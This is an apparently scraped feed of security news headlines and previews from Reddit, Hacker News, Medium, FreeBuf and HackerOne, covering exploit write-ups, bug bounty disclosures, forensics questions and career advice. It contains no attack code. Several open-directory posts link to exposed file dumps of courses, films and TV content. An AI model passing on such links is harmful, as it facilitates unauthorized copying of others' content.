    Looking for some guidance to get certifications and trainings that my department may not be aware of. Outside of vendor specific and NW3C they really haven’t pushed much. Thank you in advance. submitted by /u/Embarrassed_Sky_1193 [link] [comments]
  • Open

    ISO 27001 Awareness Training & Quiz
    Hello! Do you know any worthy of attention ISO 27001 awareness training & quiz? It should be for all internal employees. It should be something not boring, and not difficult. submitted by /u/athanielx [link] [comments]
    Incorporating YARA Into Security Processes?
    Hey guys, I just recently learned about YARA and how it can help identify malware. I want to incorporate it into our current security processes, but to be honest, I'm sorta confused as to what we can truly do with it. YARA Rules sound very similar to just signature based AV. What real advantage does YARA provide and any tips on incorporating it into our daily routines? It seems to be valuable, but after multiple TI courses and YT videos, I'm still lacking the understanding of why it's valuable and how I can use it to better our security posture. submitted by /u/haroldhanson [link] [comments]
  • Open

    CobaltStrike 流量分析与入侵检测
    作者:ainrm@薮猫科技安服团队 公众号:薮猫科技(欢迎关注)https://mp.weixin.qq.com/s/CjsqWrm70HVEnolZrRD8oA 一、前言 Cobaltstrike是一款用于团队协作的内网渗透工具,在攻防、测试中扮演着重要角色,其功能强大、使用人数众多,已被各大安全厂商列入重点"照顾"对象。常见的检测方式有基于内存和基于流量两种,本文从流量角度出发,通过抓包...
  • Open

    CobaltStrike 流量分析与入侵检测
    作者:ainrm@薮猫科技安服团队 公众号:薮猫科技(欢迎关注)https://mp.weixin.qq.com/s/CjsqWrm70HVEnolZrRD8oA 一、前言 Cobaltstrike是一款用于团队协作的内网渗透工具,在攻防、测试中扮演着重要角色,其功能强大、使用人数众多,已被各大安全厂商列入重点"照顾"对象。常见的检测方式有基于内存和基于流量两种,本文从流量角度出发,通过抓包...
  • Open

    Dev-ops and lots of e-courses
    https://www.kgay4all.com/seioqueseiporleroqueleio/ submitted by /u/inoculatemedia [link] [comments]
    Bunch of dealer mode TV content
    Big files https://cdn.loewe.tv/movies/ submitted by /u/inoculatemedia [link] [comments]

  • Open

    OSINT Blog #1
    I’m going to use this page for a few reasons. Firstly, OSINT Dojo has several rankings, for which need you to have a go at an OSINT CTF… Continue reading on Medium »
    War in Ukraine / June 15
    War in Ukraine / June 15 Continue reading on Medium »
    OSINT: How Dangerous Is It?
    What exactly is OSINT?  Open Source Intelligence (OSINT) are collections of data that can be gathered for free from public sources and… Continue reading on Medium »
    Jihadist Snapshot: Daesh & AQ Trends — Monthly Analysis #3
    The Moonshot MEA (Middle East and Africa) Snapshot Series focuses on Moonshot’s online harms and violent extremism work across the Middle… Continue reading on Medium »
    Solving HariBahadur CTF
    URL to join the CTF: https://tryhackme.com/jr/haribahadur and can submit flags. The CTF is actually situated on… Continue reading on Medium »
  • Open

    That Pipe Is Still Leaking: Revisiting the RDP Named Pipe Vulnerability
    Article URL: https://www.cyberark.com/resources/threat-research-blog/that-pipe-is-still-leaking-revisiting-the-rdp-named-pipe-vulnerability Comments URL: https://news.ycombinator.com/item?id=31771796 Points: 2 # Comments: 0
  • Open

    Consolidate split .e01 image files into single file?
    While creating an image of a 128GB disk, I accidentally set it to split the image into 2GB files. For some situations dealing with 18 files is not ideal. I'm wondering, is there is a way to consolidate the split files into one file? Preferably without mounting the split image and creating a new one? submitted by /u/thenebular [link] [comments]
    Using write blocker to image a drive that is still in computer.
    Anyone have experience using write-blocker to connect and image in the following setup? laptop ——writeblocker—— laptop Any help would be nice thanks ! submitted by /u/mr_merica20 [link] [comments]
    Was given a .dist for NICE Inform, need to convert it to useable audio
    Hello, I've been tasked to combine 911 calls into a playable .mp4. The discovery package includes a .distribution that will only open with NICE Inform. I'm the most tech-savvy of the bunch, but this is really above my pay grade. If anyone has been able to free the audio files from this software before I'd appreciate any advice. Thank you. submitted by /u/Dcap16 [link] [comments]
  • Open

    数据库攻防之MySQL
    MySQL 是最流行的关系型数据库,是红队攻防中最常遇到的数据库。
    从概念到安全实践:软件供应链基础指南
    研究显示,黑客正积极瞄准开源组件以伺机进入软件供应链。在过去的12个月内,针对开源工具的网络攻击增加了650%。
    FreeBuf早报 | 美陆军将云计算技术运用于实战;乌克兰将国家重要数据迁移至邻国
    美陆军将云计算技术融入到指挥所计算环境的开发和试验中,从而在战术边缘提供持续的任务指挥能力。
    国际刑警查获五千万美元,逾两千名“社会工程师”被捕
    一项代号为”First Light 2022“的国际执法行动在全球范围内共查获了5000万美元赃款,数千名参与社会工程诈骗的人遭到逮捕。
    「网安新势力」创始人联盟季 6月22日10点强势来袭!
    解锁7位网安创始人,探寻网安行业新兴技术趋势。
    构建低延时高并发的企业防护架构 | CIS夏日版议题前瞻
    应对威胁态势发展的步伐,数字化时代的WAF该如何演进?让CIS安全专家告诉你!
    邮件巨头Zimbra曝严重漏洞,黑客无需密码即可登录
    通过利用该漏洞,黑客可以在没有身份验证或用户交互的情况下窃取登录信息。
    思科电子邮件存在安全漏洞,攻击者可利用漏洞登录其Web管理界面
    该漏洞可能允许攻击者绕过身份验证并登录到思科电子邮件网关设备的Web管理界面。
    攻击者利用三年前的 Telerik 漏洞部署 Cobalt Strike
    一个被称为Blue Mockingbird的攻击者利用 Telerik UI 漏洞来破坏服务器,安装 Cobalt Strike 信标。
  • Open

    That Pipe is Still Leaking: Revisiting the RDP Named Pipe Vulnerability
    submitted by /u/jat0369 [link] [comments]
    Analysing RTF files from SideWinder APT
    submitted by /u/OwnPreparation3424 [link] [comments]
    CVE-2022-23088: Exploiting a Heap Overflow in the FreeBSD Wi-Fi Stack
    submitted by /u/Gallus [link] [comments]
    The Android kernel mitigations obstacle race
    submitted by /u/0xdea [link] [comments]
    Quick Malware Analysis Using Free Tools: Malware infection from Brazil malspam pcap from 2022-04-19
    submitted by /u/dougburks [link] [comments]
    VED (Vault Exploit Defense): Open source implementation
    submitted by /u/hardenedvault [link] [comments]
    Shadow Credentials - Red Teaming Experiments
    submitted by /u/Kondencuotaspienas [link] [comments]
    DriftingCloud: Zero-Day Sophos Firewall Exploitation and an Insidious Breach
    submitted by /u/cryptogram [link] [comments]
  • Open

    xmlrpc file enabled
    Yelp disclosed a bug submitted by happykira0x1: https://hackerone.com/reports/1575401
    curl "globbing" can lead to denial of service attacks
    curl disclosed a bug submitted by iylz: https://hackerone.com/reports/1572120
    CSRF (protection bypassed) to force a below 18 user into viewing an nsfw subreddit !
    Reddit disclosed a bug submitted by marvelmaniac: https://hackerone.com/reports/1480569 - Bounty: $500
    Stored XSS on TikTok Live Form
    TikTok disclosed a bug submitted by aidilarf_2000: https://hackerone.com/reports/1542703 - Bounty: $1500
  • Open

    How I secured ISP (Internet Service Provider)
    Hello everyone hope all are safe and doing good. I am Cypher_Jerry Aka Harsha from Telangana, and a part-time bug bounty hunter. Continue reading on Medium »
    Bypass Email Confirmation
    Hello everyone. In this blog, I will share my finding on How I was able to bypass the email confirmation by just paying close observation… Continue reading on Medium »
    The Helio Bounty Program is now live
    We are pleased to announce the official start of the Helio Bounty Program for our community and security researchers. It is critical to… Continue reading on Medium »
    All onliners for bug bounty hunters
    check all oneliners below. Continue reading on Medium »
    $700 Bounty writeup
    Hello readers, Continue reading on Medium »
    Hacking into WordPress themes for CVEs and Fun.
    Hi there! I hope all is well with you. In this writeup, I’ll discuss about the research I did on a WordPress theme, which taught me a lot… Continue reading on Pentester Nepal »
    Aurora Stalls A Sizable DeFi Hack, Pays $6M Bug Bounty through Immunefi
    It could have been the next market-moving DeFi hack, but thanks to bug bounty! Continue reading on Medium »
    CSRF leads to account takeover in Yahoo!
    How I managed to hack the accounts of arbitrary users of a Yahoo! application in only 30 minutes. Continue reading on Medium »
    XSS Blind Stored at Asset Domain Android Apps TikTok
    Hi everyone Continue reading on Medium »
  • Open

    Caldera: Red Team Emulation (Part 1)
    This article aims to demonstrate an open-source breach & emulation framework through which red team activity can be conducted with ease. It focuses on MITRE The post Caldera: Red Team Emulation (Part 1) appeared first on Hacking Articles.
    Caldera: Red Team Emulation (Part 1)
    This article aims to demonstrate an open-source breach & emulation framework through which red team activity can be conducted with ease. It focuses on MITRE The post Caldera: Red Team Emulation (Part 1) appeared first on Hacking Articles.
  • Open

    Are these skills are enough to get me a decent entry level job in pentesting ?
    I am studying engineering (1.5 years left to graduate) and wanna drop out badly, i am based in Egypt and wondering if these skills are enough to get me a decent entry level job in pentesting (remote or not) once i drop out. - 2 years experience in bug bounty hunting (only like 20 valid bugs cause it was besides college (xss, info disclosures, etc)) - solid programming experience ( been programming as a hobby for over 6 years honestly thats about it, i also know stuff like basic networking, linux (main OS), owasp top ten and more but the two points i mentioned earlier are best of what i can put on a resume. i also went for OSCP once and failed, gonna retake it but don't wanna put it here as a certainty of course :) Lets say i take a few months after dropping out to improve my resume, start a blog, write a few technical writeups, explain sec stuff and what not, also maybe find a few CVES to add to resume, is this enough to start applying ? how will not having a degree affect my chances? submitted by /u/watermelonSoundsNice [link] [comments]
  • Open

    CVE-2022-23088: Exploiting a Heap Overflow in the FreeBSD Wi-Fi Stack
    Article URL: https://www.thezdi.com/blog/2022/6/15/cve-2022-23088-exploiting-a-heap-overflow-in-the-freebsd-wi-fi-stack Comments URL: https://news.ycombinator.com/item?id=31768705 Points: 111 # Comments: 9
  • Open

    Attacks on Blockchain
    No content preview
  • Open

    Attacks on Blockchain
    No content preview
  • Open

    Attacks on Blockchain
    No content preview
  • Open

    SecWiki News 2022-06-16 Review
    CobaltStrike 流量分析与入侵检测 by ourren Google对于云安全未来的发展方向(CISO 云安全转型指南白皮书) by ourren CyberBattleSim(内网自动化渗透)研究分析 by ourren 一文读懂事件知识图谱 by ourren 信息安全BP的能力模型 by ourren 关于BIS的《信息安全控制:网络安全条目》的解读及影响分析 by ourren 《现有SBOM格式和标准调查》译文 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-06-16 Review
    CobaltStrike 流量分析与入侵检测 by ourren Google对于云安全未来的发展方向(CISO 云安全转型指南白皮书) by ourren CyberBattleSim(内网自动化渗透)研究分析 by ourren 一文读懂事件知识图谱 by ourren 信息安全BP的能力模型 by ourren 关于BIS的《信息安全控制:网络安全条目》的解读及影响分析 by ourren 《现有SBOM格式和标准调查》译文 by ourren 更多最新文章,请访问SecWiki
  • Open

    IOC-based threat hunting for free and without registration
    submitted by /u/Cultural_Budget6627 [link] [comments]
  • Open

    Hang Fire: Challenging our Mental Model of Initial Access
    For as long as I’ve been working in security, initial access has generally looked the same. While there are high degrees of variation… Continue reading on Posts By SpecterOps Team Members »
  • Open

    How to see the impact installing BApps might have on Burp Suite
    If you've ever installed any Burp extensions from the BApp Store, you'll know that it's a great way to extend your capabilities and tailor Burp Suite to your every need. If you've not, then what are y
  • Open

    How to see the impact installing BApps might have on Burp Suite
    If you've ever installed any Burp extensions from the BApp Store, you'll know that it's a great way to extend your capabilities and tailor Burp Suite to your every need. If you've not, then what are y
  • Open

    Lots of education videos & classes from few different sources
    I havent been through all of these yet but it seems to be up to date stuff. http://s28.bitdl.ir/Video/ submitted by /u/Allouttagoodnames [link] [comments]
    Help me!!!!
    Can anyone help me find the link or knows where I can download season 1 of gentleman jack series? I’ve searched for too long. Please help. submitted by /u/Bubbless02 [link] [comments]
  • Open

    CodeQL 数据库创建原理分析
    作者:六炅 本文为作者投稿,Seebug Paper 期待你的分享,凡经采用即有礼品相送! 投稿邮箱:paper@seebug.org Preface CodeQL是一款不错的代码分析扫描工具,于我而言对漏洞挖掘有很大的帮助。使用它也有一定时间了,之前一直接触的是开源项目,所以借助CodeQL进行数据库创建和分析还是相对简单的,不会有过多的限制。最近在进行Java反序列化利用链挖掘时,接触了...
  • Open

    CodeQL 数据库创建原理分析
    作者:六炅 本文为作者投稿,Seebug Paper 期待你的分享,凡经采用即有礼品相送! 投稿邮箱:paper@seebug.org Preface CodeQL是一款不错的代码分析扫描工具,于我而言对漏洞挖掘有很大的帮助。使用它也有一定时间了,之前一直接触的是开源项目,所以借助CodeQL进行数据库创建和分析还是相对简单的,不会有过多的限制。最近在进行Java反序列化利用链挖掘时,接触了...

  • Open

    OSINT: the art of discovering the existing
    By Luli Rosenberg Continue reading on Medium »
    War in Ukraine / June 14
    Europe wants Ukraine to prepare for negotiations Continue reading on Medium »
    404CTF — Nom d’une nouvelle [extrême] recrue #OSINT
    Continue reading on Medium »
  • Open

    Rate limit Bypass on contact-us through IP Rotator (burp extension)(https://www.linkedin.com/help/linkedin/solve/contact)
    LinkedIn disclosed a bug submitted by sachinrajput: https://hackerone.com/reports/1578121
    Delete direct message history without access the proper conversation_id
    Twitter disclosed a bug submitted by saiful6601: https://hackerone.com/reports/1487804 - Bounty: $560
    Remote 0click exfiltration of Safari user's IP address
    Twitter disclosed a bug submitted by max2x: https://hackerone.com/reports/1392211 - Bounty: $560
    The software does not implement sufficient measures to prevent multiple failed authentication attempts within in a short time frame, making it more su
    LinkedIn disclosed a bug submitted by suryasnn: https://hackerone.com/reports/1591504
    Golang : Add Query To Detect PAM Authorization Bugs
    GitHub Security Lab disclosed a bug submitted by porcupineyhairs: https://hackerone.com/reports/1597437 - Bounty: $1800
    Golang : Hardcoded secret used for signing JWT
    GitHub Security Lab disclosed a bug submitted by porcupineyhairs: https://hackerone.com/reports/1595009 - Bounty: $1800
    CPP: Add query for CWE-243 Creation of chroot Jail Without Changing Working Directory
    GitHub Security Lab disclosed a bug submitted by ihsinme: https://hackerone.com/reports/1582697 - Bounty: $1000
    Hyper Link Injection while signup
    UPchieve disclosed a bug submitted by 011alsanosi: https://hackerone.com/reports/1166073
  • Open

    A new vulnerability in Intel and AMD CPUs lets hackers steal encryption keys
    Article URL: https://arstechnica.com/information-technology/2022/06/researchers-exploit-new-intel-and-amd-cpu-flaw-to-steal-encryption-keys/ Comments URL: https://news.ycombinator.com/item?id=31759171 Points: 1 # Comments: 1
    SynLapse – Technical Details for Critical Azure Synapse Vulnerability
    Article URL: https://orca.security/resources/blog/synlapse-critical-azure-synapse-analytics-service-vulnerability/ Comments URL: https://news.ycombinator.com/item?id=31752026 Points: 1 # Comments: 0
    SynLapse – Technical Details for Critical Azure Synapse Vulnerability
    Article URL: https://orca.security/resources/blog/synlapse-critical-azure-synapse-analytics-service-vulnerability/ Comments URL: https://news.ycombinator.com/item?id=31748624 Points: 4 # Comments: 0
  • Open

    Pulling MikroTik into the Limelight
    submitted by /u/0xdea [link] [comments]
    Breaking Secure Boot on Google Nest Hub (2nd Gen) to run Ubuntu
    submitted by /u/Gallus [link] [comments]
    Pwn2Own 2021 Canon ImageCLASS MF644Cdw writeup
    submitted by /u/alain_proviste [link] [comments]
    TPM Sniffing Attacks Against Non-Bitlocker Targets
    submitted by /u/Gallus [link] [comments]
    Bypassing CSP with dangling iframes
    submitted by /u/Gallus [link] [comments]
  • Open

    Red Teaming reconnaissance Process
    Table of Contents Continue reading on Medium »
    Bug Bounty — Injection Part
    Injection flaws are very common in applications today. These flaws occur because user controlled input is interpreted as actual commands… Continue reading on Medium »
    PhpMyAdmin Setup is Accessible Without Authentication
    Description: Continue reading on Medium »
    Getting Started with AllianceBlock DEX on Mainnet
    We walk you through how to use the AllianceBlock DEX, as well as some updates on our progress on the development since we launched. Continue reading on Medium »
    Bypassing OTP verification
    We know that security is the main method of defense against hacker attacks. Some of these safeguards have not been prevailed… Continue reading on System Weakness »
  • Open

    Red Teaming reconnaissance Process
    Table of Contents Continue reading on Medium »
  • Open

    Practical Network Penetration Free Live Course
    submitted by /u/MDCDF [link] [comments]
    RAM acquisitions are extremely useful, but not often collected. This video shows how to speed up suspect password cracking with wordlists generated from RAM.
    submitted by /u/DFIRScience [link] [comments]
  • Open

    Doubt about having authenticators in a separated device
    Hello, The last year I almost get robbed with violence in the street. The robbers couldn't steal anything (they tried to take my phone). Since that day, I bought another device and set the authenticators there. That device will never leave my home, so, in case someone try to steal me or I lost my main phone, my accounts won't get affected. In case of travels, I take the backups codes with me. Do you think this is secure? Thanks for the help and have a good day. Edit: that device only has the authenticators installed and the antivirus. So, it's completely clean. submitted by /u/SilverPigtail [link] [comments]
    Gift for cybersecurity analyst
    Hi! Apologies if you get questions like this a lot, but I haven't seen anything in the last few months about it and I'm not sure how quickly the landscape changes. My husband is a cybersecurity analyst (comp eng degree? and is pretty interested in related things. For instance, I got him a raspberry pi and a pinewatch the last few bdays and he loved that. Would anybody have any suggestions for a gift? No particular price range as it's a big birthday coming up. Thanks in advance for any advice!! submitted by /u/roberl8 [link] [comments]
  • Open

    SecWiki News 2022-06-15 Review
    Google对于未来SOC的建设思考(自动化安全运营白皮书) by ourren 使用 Python 从泄露的日志中挖掘威胁情报的金矿 by ourren 自动化渗透测试工具开发实践 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-06-15 Review
    Google对于未来SOC的建设思考(自动化安全运营白皮书) by ourren 使用 Python 从泄露的日志中挖掘威胁情报的金矿 by ourren 自动化渗透测试工具开发实践 by ourren 更多最新文章,请访问SecWiki
  • Open

    What I Learned In This Week In Cyber 6/16/22
    This week has been quite exciting in terms of what the concepts explored. Here is a highlight of some the concepts I delved into: Continue reading on CodeX »
    What I Learned In This Week In Cyber 6/16/22
    This week has been quite exciting in terms of what the concepts explored. Here is a highlight of some the concepts I delved into: Continue reading on Medium »
  • Open

    【安全通报】2022年6月微软漏洞补丁日修复多个高危漏洞
    近日,微软发布 2022年6月 安全补丁,修复了针对 33 款微软产品的 55 个漏洞,其中12个权限提升漏洞,1个安全功能绕过漏洞,27个远程代码执行漏洞,11个信息泄露...
  • Open

    【安全通报】2022年6月微软漏洞补丁日修复多个高危漏洞
    近日,微软发布 2022年6月 安全补丁,修复了针对 33 款微软产品的 55 个漏洞,其中12个权限提升漏洞,1个安全功能绕过漏洞,27个远程代码执行漏洞,11个信息泄露...
  • Open

    Some Website Back-ends
    Website back-ends with some image assets, vectors, and templates. https://16stitches.com/assets/frontend/images/ http://hotelgreenridge.com/wp-content/uploads/ https://huemint.com/assets/ submitted by /u/amritajaatak [link] [comments]
    [French Language Only] Limited Number of Films & TV Series
    http://www.vodservices-ftp.com/FTP_Upload/TEM/ submitted by /u/worldbbbbfree [link] [comments]
  • Open

    FreeBuf早报 | 尼日利亚制定草案监管互联网公司;谷歌修复 7 个 Chrome 浏览器漏洞
    新修订的《移动互联网应用程序信息服务管理规定》自2022年8月1日起施行。
    恶意软件竟被上架谷歌商店,下载次数甚至超200万次
    网络安全研究人员上个月在Google Play商店中发现了广告软件和窃取信息恶意软件。
    勒索又玩新花样,让受害者主动查询数据是否被盗
    为了提高勒索效率,勒索软件团伙BlackCat创建一个专门网站,允许受害者检查他们的数据是否在攻击中被盗。
    《移动互联网应用程序信息服务管理规定》将于8月1日施行
    新《规定》共27条,包括信息内容主体责任、真实身份信息认证、分类管理、行业自律、社会监督及行政管理等条款。
  • Open

    AdmirerToo from HackTheBox — Detailed Walkthrough
    No content preview
    Phishing Domain Detection using Neural Networks
    Applying neural networks on domain name analysis to detect phishing Continue reading on InfoSec Write-ups »
  • Open

    AdmirerToo from HackTheBox — Detailed Walkthrough
    No content preview
    Phishing Domain Detection using Neural Networks
    Applying neural networks on domain name analysis to detect phishing Continue reading on InfoSec Write-ups »
  • Open

    AdmirerToo from HackTheBox — Detailed Walkthrough
    No content preview
    Phishing Domain Detection using Neural Networks
    Applying neural networks on domain name analysis to detect phishing Continue reading on InfoSec Write-ups »
  • Open

    下一代 Windows 漏洞利用:攻击通用日志文件系统
    作者:360漏洞研究院 许仕杰 宋建阳 李林双 原文链接:https://vul.360.net/archives/438 概述 近两年通用日志文件系统模块 (clfs) 成为了 Windows 平台安全研究的热点,本文首先会介绍一些关于 clfs 的背景知识,然后会介绍我们是如何对这个目标进行 fuzz ,最后将分享几个漏洞案例以及我们是如何使用一种新方法实现本地提权。 背景知识 根据微软...
    Adobe Reader 漏洞 CVE-2021-44711 利用浅析
    作者:360漏洞研究院 李双 王志远 willJ 原文链接:https://vul.360.net/archives/434 背景 Adobe Reader 在今年 1 月份对外发布的安全补丁中,修复了一个由 Cisco Talos安全团队报告的安全漏洞,漏洞编号 CVE-2021-44711,经过分析,该漏洞与我们完成漏洞利用所使用的漏洞一致. 漏洞存在于与注释进行交互的 JavaScri...
    机架式设备漏洞挖掘
    作者:360漏洞研究院 原文链接:https://vul.360.net/archives/413 0x01 简介 lot设备漏洞挖掘,其实核心就是拿到运行在硬件设备内的“软件”,然后就变成了常规的软件漏洞挖掘。剩下的就是常规的漏洞挖掘步骤就跟软件漏洞挖掘步骤一致,进行逆向和审计即可。本文主要介绍机架式、虚拟镜像形式的防火墙堡垒机等安全设备的漏洞挖掘步骤及思路。文后也将展示部分相关设备的漏洞...
    Math.abs JIT Optimization Bug in JSC
    作者:360漏洞研究院 戴建军 原文链接:https://vul.360.net/archives/397 2021年天府杯我们成功完成iPhone 13 pro RCE的目标,这篇文章将会详细介绍其中使用到的Safari JavaScriptCore(JSC) 漏洞,漏洞编号为CVE-2021-30953。 ArithNegate 在JSC的JIT FTL优化过程中,对于 -n 的表达式会...
    USMA:用户态映射攻击
    作者:360漏洞研究院 刘永 王晓东 姚俊 原文链接:https://vul.360.net/archives/391 概述 众所周知,ROP是一种主流的Linux内核利用方式,它需要攻击者基于漏洞来寻找可用的gadgets,然而这是一件十分耗费时间和精力的事情,并且有时候很有可能找不到合适的gadget。此外由于CFI(控制流完整性校验)利用缓解措施已经被合并到了Linux内核主线中了,所...
  • Open

    下一代 Windows 漏洞利用:攻击通用日志文件系统
    作者:360漏洞研究院 许仕杰 宋建阳 李林双 原文链接:https://vul.360.net/archives/438 概述 近两年通用日志文件系统模块 (clfs) 成为了 Windows 平台安全研究的热点,本文首先会介绍一些关于 clfs 的背景知识,然后会介绍我们是如何对这个目标进行 fuzz ,最后将分享几个漏洞案例以及我们是如何使用一种新方法实现本地提权。 背景知识 根据微软...
    Adobe Reader 漏洞 CVE-2021-44711 利用浅析
    作者:360漏洞研究院 李双 王志远 willJ 原文链接:https://vul.360.net/archives/434 背景 Adobe Reader 在今年 1 月份对外发布的安全补丁中,修复了一个由 Cisco Talos安全团队报告的安全漏洞,漏洞编号 CVE-2021-44711,经过分析,该漏洞与我们完成漏洞利用所使用的漏洞一致. 漏洞存在于与注释进行交互的 JavaScri...
    机架式设备漏洞挖掘
    作者:360漏洞研究院 原文链接:https://vul.360.net/archives/413 0x01 简介 lot设备漏洞挖掘,其实核心就是拿到运行在硬件设备内的“软件”,然后就变成了常规的软件漏洞挖掘。剩下的就是常规的漏洞挖掘步骤就跟软件漏洞挖掘步骤一致,进行逆向和审计即可。本文主要介绍机架式、虚拟镜像形式的防火墙堡垒机等安全设备的漏洞挖掘步骤及思路。文后也将展示部分相关设备的漏洞...
    Math.abs JIT Optimization Bug in JSC
    作者:360漏洞研究院 戴建军 原文链接:https://vul.360.net/archives/397 2021年天府杯我们成功完成iPhone 13 pro RCE的目标,这篇文章将会详细介绍其中使用到的Safari JavaScriptCore(JSC) 漏洞,漏洞编号为CVE-2021-30953。 ArithNegate 在JSC的JIT FTL优化过程中,对于 -n 的表达式会...
    USMA:用户态映射攻击
    作者:360漏洞研究院 刘永 王晓东 姚俊 原文链接:https://vul.360.net/archives/391 概述 众所周知,ROP是一种主流的Linux内核利用方式,它需要攻击者基于漏洞来寻找可用的gadgets,然而这是一件十分耗费时间和精力的事情,并且有时候很有可能找不到合适的gadget。此外由于CFI(控制流完整性校验)利用缓解措施已经被合并到了Linux内核主线中了,所...
  • Open

    CVE-2022-29143 Microsoft SQL Server Remote Code Execution
    Article URL: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-29143 Comments URL: https://news.ycombinator.com/item?id=31748201 Points: 4 # Comments: 0

  • Open

    Counting in Regexes Considered Harmful: Exposing ReDoS Vulnerability of Nonback
    Article URL: https://www.usenix.org/conference/usenixsecurity22/presentation/turonova Comments URL: https://news.ycombinator.com/item?id=31747225 Points: 1 # Comments: 0
    Intel and AMD Hertzbleed CPU Vulnerability Uses Boost Speed to Steal Crypto Keys
    Article URL: https://www.tomshardware.com/news/intel-amd-hertzbleed-cpu-vulnerability-boost-clock-speed-steal-crypto-keys Comments URL: https://news.ycombinator.com/item?id=31745490 Points: 1 # Comments: 0
    SynLapse – Technical Details for Critical Azure Synapse Vulnerability
    Article URL: https://orca.security/resources/blog/synlapse-critical-azure-synapse-analytics-service-vulnerability/ Comments URL: https://news.ycombinator.com/item?id=31741670 Points: 7 # Comments: 1
  • Open

    Why Are My Junctions Not Followed? Exploring Windows Redirection Trust Mitigation
    Junctions are a feature of the NT file system – and a common way that attackers exploit file system redirection attacks. Learn about mitigation. The post Why Are My Junctions Not Followed? Exploring Windows Redirection Trust Mitigation appeared first on Unit 42.
  • Open

    Developer’s mistakes leads to full ATO!
    A wise man once sad “In order to get high quality bugs, start playing with the website’s functionalities.” Continue reading on Medium »
  • Open

    Windows Subsystem for Linux
    I am doing an investigation right now and found a ext4.Vhdx. When I researched this file it said that it would most commonly be associated with WSL allowing a user to run Linux commands without having to boot into a Linux partition. Is there any potential forensic value found here? And how do I get it to open. I exported it out and tried processing it with Axiom, but it didn’t really work. Edit: I was able to get it extracted from its zip file and loaded into Axiom. Looks like it is a 256GB size, but there are no files active. It is just empty space. Am I missing something or could this be some sort of thing where the user or malicious actor set it up and never used it? submitted by /u/trex4n6 [link] [comments]
    Entry level Certification recommendations
    Hi all, I am wondering what certifications you would recommend for someone going into DF? I am going to Kent state in the fall to get my BS in Computer Engineering Technology with a minor in computer forensics and security. I want recommendations for certifications that I could take as a HS grad. Thanks submitted by /u/swatteam23 [link] [comments]
    Passware On T2 macboo air help.
    I have a macbook air(2020) with t2 and password protected. Im trying to use passware's new t2 option and use a custom dictionary attack. Im getti g stuck at the DFU stage. Can someone private message me if they have any experience. Other details:Ive used multiple different cables witht out success.Im using my foreneic macbook pro , Big Sur. submitted by /u/james1234cb [link] [comments]
    Locked Cellphone
    So I have a locked cellphone and was recommended a software that is way to expensive. Since it is just one phone it was mention that back in the day they sent it to CAS. Anyone know more about the services/lab, example is it an accredited lab? Im going to reach out to them, but in the mean time though I would try here. Has anyone brought one of these devices to court after CAS touched it? submitted by /u/fanmajor2 [link] [comments]
    Volatility2 RHEL 8 profile
    I'm attempting to use Volatility to perform memory analysis on a RHEL8 .vmem file. Unfortunately the latest RHEL profile available at https://github.com/volatilityfoundation/profiles is for 6.7. I did see some example CLI where a LinuxRedhat8_3_4_18_0-240x64 profile was used. Can anyone by chance link/send me a RHEL8 profile for Volatility? submitted by /u/Styrophoams [link] [comments]
  • Open

    Red-Team Project Management
    Say you perform a red team assessment in a network. How do you keep track of your tools, agents, etc. that you've deployed during your project? Do you use any kind of software for documenting and saving your artifacts? How do you manage it when working with multiple people on your team? submitted by /u/w0rmh013x [link] [comments]
    Why it's important to remove stale devices on AD?
    I understand why it's important to deleted inactive users on AD, but why we should remove unused/dead devices? What is a security risks? submitted by /u/athanielx [link] [comments]
    What exactly does uPNP does?
    I have reading about uPNP, and I am stuck at whether we need to submit the wifi password in the uPNP device to connect it to a network? It says uPNP can auto configure and doesn't need authentication. We can simply specify the port number and it gets connects the device to that service. Does our smartphone use uPNP when getting connected to a Wifi network? What devices use uPNP? submitted by /u/mkkedia3 [link] [comments]
    Vivo Fibra with public IP routers, safe?
    Hi, hope you're all alright! So, Vivo is my ISP here in Brazil and they send their own router for you to connect to their fiber providers. These routers however have their public IP open to the internet, that I can only imagine is for support reasons. Through this IP, you can actually access the router interface (http, not https), with things like hardware model, serial number and software version freely accessible, only the configuration page is behind a login form. My fear is this is not a secure setup. I even searched my hardware model and found out a big CVE where you could get access though ssh, but I think is fixed on my machine. Another weird thing are the DNS6 servers (2001:12e0:0:1025:a080::115 and others), which cannot be changed. You can actually search this DNS on Google and find many such routers there. I never trusted Vivo, so I always used a personal router where my devices are connected and disabled their WiFi. I'm now disabling their IPv6, to avoid this Google thing. But is this safe? Are my fears not based on reality? submitted by /u/TiagodePAlves [link] [comments]
  • Open

    Hertzbleed - a new family of side-channel attacks
    submitted by /u/CyberMasterV [link] [comments]
    Oblivious HTTP
    submitted by /u/nangaparbat [link] [comments]
    Zimbra Email - Stealing Clear-Text Credentials via Memcache injection
    submitted by /u/0xdea [link] [comments]
    CVE-2022-25845 – Analyzing the Fastjson “Auto Type Bypass” RCE vulnerability
    submitted by /u/SRMish3 [link] [comments]
    What if you don't secure SSH on EC2? - Analysis of the real threats
    submitted by /u/capitangolo [link] [comments]
    Chaining vulnerabilities to criticality in Progress WhatsUp Gold
    submitted by /u/Mempodipper [link] [comments]
    Credential Protection in Chromium-based Browsers
    submitted by /u/jat0369 [link] [comments]
    If you want to play with Dogwalk windows vulnerability
    submitted by /u/cryptaureau [link] [comments]
    Quick Malware Analysis: Emotet Epoch 5 infection with spambot traffic pcap from 2022-04-04
    submitted by /u/dougburks [link] [comments]
  • Open

    Analysis of Chinese aircraft carriers their history, modifications, spotted places, and what the…
    The president of the United States, Joe Biden, has answered “yes” during a press conference on May 23, 2022 in South Korea, to the… Continue reading on Medium »
    Introduction to OSINT
    Open Source Intelligence (OSINT) is a collective term used to describe all techniques and tools used to harvest information from publicly… Continue reading on Medium »
    War in Ukraine / June 13
    Russia earned $98 billion from energy exports in 100 days of war Continue reading on Medium »
  • Open

    Introducing Ghostwriter v3.0
    The Ghostwriter team recently released v3.0.0. This release represents a significant milestone for the project, and there has never been a… Continue reading on Posts By SpecterOps Team Members »
    หนึ่งวันของทีม Cyber Security ที่ KBTG
    แม้ว่าลักษณะงานของทั้ง 3 ทีมจะแตกต่างกันออกไป แต่เรามีเป้าหมายที่เป็นอันหนึ่งอันเดียวกัน คือการทำให้ธนาคารปลอดภัยจากภัยคุกคามทางไซเบอร์ Continue reading on KBTG Life »
    How to set up and operate a red team in your company to support a sustainable cybersecurity…
    Hack yourself to prevent from being hacked. This more or less describes the term "Red Teaming." But why do you need a red team though you… Continue reading on CodeX »
